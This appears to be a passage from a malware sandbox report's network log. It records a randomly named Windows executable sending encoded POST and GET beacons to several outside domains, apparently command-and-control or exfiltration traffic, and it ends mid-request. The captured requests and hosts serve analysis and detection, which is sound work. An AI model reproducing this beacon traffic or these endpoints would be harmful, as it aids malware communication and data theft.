                                                                                              8192.168.2.649994172.191.244.62802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:53:58.429929018 CEST564OUTGET /fpzw/?I4ET5=vk5QQsijTkj0pfFyU7EEWfDzTnpieIWgcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVx4v2Cu8U6PY7doS41bFIW7T/4/1mYTXkrfUCe/4cLGyNDvWcha0=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.tekilla.wtf
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:53:58.877970934 CEST195INHTTP/1.1 404 Not Found
                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Date: Tue, 08 Oct 2024 13:53:58 GMT
                                                                                              Content-Length: 19
                                                                                              Connection: close
                                                                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                              Data Ascii: 404 page not found


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.649995172.96.191.39802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:04.354361057 CEST823OUTPOST /3qit/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.bola88site.one
                                                                                              Origin: http://www.bola88site.one
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.bola88site.one/3qit/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 67 31 45 79 62 67 73 31 62 6f 61 58 68 59 54 73 57 54 66 36 37 76 41 63 2b 35 75 72 4b 42 75 63 73 41 36 42 31 4a 69 30 42 38 79 4f 30 6d 61 7a 45 71 33 54 6b 66 6c 78 50 70 51 77 58 52 4f 6d 51 41 58 37 38 39 52 48 36 79 30 34 38 6a 65 4c 73 55 38 30 49 43 74 70 32 35 64 2b 42 73 62 45 44 6a 65 44 42 5a 68 31 49 31 69 61 7a 79 6e 36 74 58 6f 4c 71 49 74 7a 4d 57 64 52 65 31 69 52 74 6a 70 70 4a 49 2f 7a 58 4a 35 39 2f 58 31 2f 34 2f 77 57 46 66 51 65 58 54 5a 63 37 6e 47 65 55 62 30 76 65 55 73 32 37 75 46 2b 36 55 4f 6e 57 6a 6c 74 73 68 54 4b 62 34 70 35 35 71 66 45 42 43 4d 70 68 65 68 7a 34 52 55 4c
                                                                                              Data Ascii: I4ET5=g1Eybgs1boaXhYTsWTf67vAc+5urKBucsA6B1Ji0B8yO0mazEq3TkflxPpQwXROmQAX789RH6y048jeLsU80ICtp25d+BsbEDjeDBZh1I1iazyn6tXoLqItzMWdRe1iRtjppJI/zXJ59/X1/4/wWFfQeXTZc7nGeUb0veUs27uF+6UOnWjltshTKb4p55qfEBCMphehz4RUL
                                                                                              Oct 8, 2024 15:54:05.214426994 CEST1033INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 796
                                                                                              date: Tue, 08 Oct 2024 13:54:05 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.649996172.96.191.39802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:06.899178028 CEST847OUTPOST /3qit/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.bola88site.one
                                                                                              Origin: http://www.bola88site.one
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.bola88site.one/3qit/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 6d 4f 30 47 71 7a 46 72 33 54 6c 66 6c 78 48 4a 51 31 64 78 50 6b 51 41 72 4e 38 2f 31 48 36 32 6b 34 38 69 75 4c 76 6c 38 33 61 69 74 72 77 35 64 77 4f 4d 62 45 44 6a 65 44 42 5a 64 66 49 31 36 61 7a 44 58 36 74 32 6f 4b 70 49 74 30 50 57 64 52 4d 46 69 56 74 6a 70 41 4a 4a 7a 5a 58 4c 78 39 2f 57 46 2f 32 4f 77 58 51 76 51 59 5a 7a 59 4f 79 6c 48 77 65 59 6c 54 41 6b 73 69 6a 63 68 39 79 43 50 39 4b 51 6c 4f 2b 78 7a 49 62 36 78 4c 35 4b 66 75 44 43 30 70 7a 4a 74 55 33 6c 78 6f 68 43 46 58 36 79 62 47 73 4a 48 71 52 54 4d 73 68 2b 45 31 74 77 3d 3d
                                                                                              Data Ascii: I4ET5=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOmO0GqzFr3TlflxHJQ1dxPkQArN8/1H62k48iuLvl83aitrw5dwOMbEDjeDBZdfI16azDX6t2oKpIt0PWdRMFiVtjpAJJzZXLx9/WF/2OwXQvQYZzYOylHweYlTAksijch9yCP9KQlO+xzIb6xL5KfuDC0pzJtU3lxohCFX6ybGsJHqRTMsh+E1tw==
                                                                                              Oct 8, 2024 15:54:07.888030052 CEST1033INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 796
                                                                                              date: Tue, 08 Oct 2024 13:54:07 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.649997172.96.191.39802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:09.448296070 CEST1860OUTPOST /3qit/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.bola88site.one
                                                                                              Origin: http://www.bola88site.one
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 1246
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.bola88site.one/3qit/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 67 31 45 79 62 67 73 31 62 6f 61 58 7a 6f 44 73 61 55 4c 36 36 50 41 62 67 70 75 72 44 68 75 59 73 41 32 42 31 4d 43 65 41 4f 65 4f 33 33 4b 7a 46 49 66 54 69 66 6c 78 59 35 51 30 64 78 50 6c 51 41 43 45 38 2f 35 58 36 30 73 34 36 42 6d 4c 71 52 67 33 51 69 74 72 38 5a 64 78 42 73 62 52 44 6c 2b 48 42 64 39 66 49 31 36 61 7a 41 66 36 36 33 6f 4b 76 49 74 7a 4d 57 64 56 65 31 69 39 74 69 4e 78 4a 4a 32 73 58 36 52 39 34 32 56 2f 30 38 59 58 53 50 51 61 55 54 5a 4c 79 6c 4c 7a 65 59 34 71 41 6e 77 45 6a 66 39 39 78 6b 36 4c 50 6a 35 44 6a 42 54 43 4b 34 46 5a 6e 4f 58 61 4c 51 77 70 77 4c 31 68 78 6e 46 37 6d 48 78 31 79 42 61 58 6b 36 62 4c 61 57 52 4a 6b 50 74 64 77 7a 62 2f 77 6f 65 78 51 77 61 65 6d 76 79 65 56 73 43 39 37 79 43 30 52 6a 38 77 49 79 76 33 35 4d 31 70 50 5a 44 71 73 4c 38 5a 37 4f 69 2b 57 51 36 74 4c 56 79 74 75 76 75 5a 77 33 74 51 62 2b 49 63 39 4c 61 5a 4c 4b 6f 6a 65 51 41 43 62 32 36 5a 42 58 39 6b 37 6e 69 45 6a 6e 4a 4f 64 59 59 69 6d 4b 77 59 58 70 46 77 [TRUNCATED]
                                                                                              Data Ascii: I4ET5=g1Eybgs1boaXzoDsaUL66PAbgpurDhuYsA2B1MCeAOeO33KzFIfTiflxY5Q0dxPlQACE8/5X60s46BmLqRg3Qitr8ZdxBsbRDl+HBd9fI16azAf663oKvItzMWdVe1i9tiNxJJ2sX6R942V/08YXSPQaUTZLylLzeY4qAnwEjf99xk6LPj5DjBTCK4FZnOXaLQwpwL1hxnF7mHx1yBaXk6bLaWRJkPtdwzb/woexQwaemvyeVsC97yC0Rj8wIyv35M1pPZDqsL8Z7Oi+WQ6tLVytuvuZw3tQb+Ic9LaZLKojeQACb26ZBX9k7niEjnJOdYYimKwYXpFwuK8OvrWAV/rnopzyx8fx4p+0I4IUK+G0enV6Gfb5/zKnvtQKSYepwdX0dM9cGyjFm6n8dY44UlXONCuclSv/lFRTiH7Y8GEe75OLM4wfTvVbcTh/P6Hw0iy1FQ6xwVDj6x6CVhuVsM3HYUzrocukm1yQP1tICWcO+PQy07yON5QgvxGI0OPE15CmeufG58WikVhHtZtjn8FDXXkpVeVg4ZDrlip2V9VEOhYnaUS2HKDP3TgHnRL62sju+7cIN/dfz1XOxZ9F7ivlmJIUTz8OD9/LUNi13IPrQtbpGSPPkDtHjXejCFXE3oUUPJ45Wo7PTrDnfkE2w2+2SU9PHcQRhsQgcS3lkB0L9ZSvNxH2ZykaGIZcsnfamBT0FNlgW3b+rTiNiGVZaqdDbdEbLDQ1aJkxs4zqTzbwP4AQ/9GkoecWYeRC5oMfvQV6DtehNH8Sz7oR9L9Qu7vTdyR4mGUfSmb/DAKdLe3wpszHv/sZC3NtSenqub3KZLHV7XrNytR6sEpPQFc40QfDb65QJqy3YKUKN73i3c1Vp+CEjMlseHMUOpnTg3JkaQo8vGo5ZEgbaEr9ar8J3f3FYTnTs9YP5hIUE7JCOaeLjH3tkIobbCrCTvWFytKsXSWxZsGZ/kxlkVjHu9a90+5dnwu01TElUj17t45k9gE5Na [TRUNCATED]
                                                                                              Oct 8, 2024 15:54:10.367219925 CEST1033INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 796
                                                                                              date: Tue, 08 Oct 2024 13:54:10 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              12192.168.2.649998172.96.191.39802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:11.991736889 CEST567OUTGET /3qit/?I4ET5=t3sSYQcRGIG2xp6lfBDs7+5agoifCQSrmgygjruUB9PzjWbyP4PTndkMOMUzUXzJWS/x79p8zVoA5FmvnGMYQz0a67JVPuK3DRmcV/dEWB275yuHlkBzmr1SLVBbDDm50CRvDPY=&5xn03=7vMx2HlPWl HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.bola88site.one
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Oct 8, 2024 15:54:12.891012907 CEST1033INHTTP/1.1 404 Not Found
                                                                                              Connection: close
                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                              pragma: no-cache
                                                                                              content-type: text/html
                                                                                              content-length: 796
                                                                                              date: Tue, 08 Oct 2024 13:54:12 GMT
                                                                                              server: LiteSpeed
                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.649999217.70.184.50802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:17.985896111 CEST832OUTPOST /nxfn/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Origin: http://www.languagemodel.pro
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 210
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.languagemodel.pro/nxfn/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                              Data Raw: 49 34 45 54 35 3d 33 68 66 69 73 5a 74 63 61 50 77 2b 44 6e 51 6e 36 6b 68 31 57 57 33 43 52 61 62 32 76 34 38 4d 45 50 69 54 49 43 71 4a 2b 4e 75 73 56 78 6f 50 4c 67 41 77 78 75 47 68 6c 6a 41 2f 42 79 6b 66 33 66 55 78 55 4b 52 57 56 56 33 33 6f 4d 4f 36 34 2b 69 4c 5a 6c 61 51 54 30 78 57 70 4b 44 2f 47 35 39 58 58 5a 78 72 78 6e 61 4e 4d 58 78 6f 43 4e 47 78 35 32 2b 49 77 4c 46 76 73 5a 54 6e 6e 32 51 6a 37 31 43 65 4b 64 4e 47 62 72 44 50 62 49 36 4e 62 51 2f 73 64 57 41 30 6a 47 31 67 64 58 34 6d 73 6f 4d 51 38 34 52 45 38 35 5a 68 59 2f 31 66 68 7a 57 42 68 6b 62 2f 52 43 79 45 6e 65 38 77 63 59 4e 76 65 4a 75 49
                                                                                              Data Ascii: I4ET5=3hfisZtcaPw+DnQn6kh1WW3CRab2v48MEPiTICqJ+NusVxoPLgAwxuGhljA/Bykf3fUxUKRWVV33oMO64+iLZlaQT0xWpKD/G59XXZxrxnaNMXxoCNGx52+IwLFvsZTnn2Qj71CeKdNGbrDPbI6NbQ/sdWA0jG1gdX4msoMQ84RE85ZhY/1fhzWBhkb/RCyEne8wcYNveJuI
                                                                                              Oct 8, 2024 15:54:18.611948013 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                              Server: nginx
                                                                                              Date: Tue, 08 Oct 2024 13:54:18 GMT
                                                                                              Content-Type: text/html
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                              Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.650001217.70.184.50802356C:\Program Files (x86)\kKbTGrEVxHOXFZankeIgaOwhwKlfruYCEaqJfeLAGMkBWtzeWzCkqcexRbilms\URUrIrqwFu.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 8, 2024 15:54:20.526577950 CEST856OUTPOST /nxfn/ HTTP/1.1
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Host: www.languagemodel.pro
                                                                                              Origin: http://www.languagemodel.pro
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 234
                                                                                              Connection: close
                                                                                              Cache-Control: max-age=0
                                                                                              Referer: http://www.languagemodel.pro/nxfn/
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
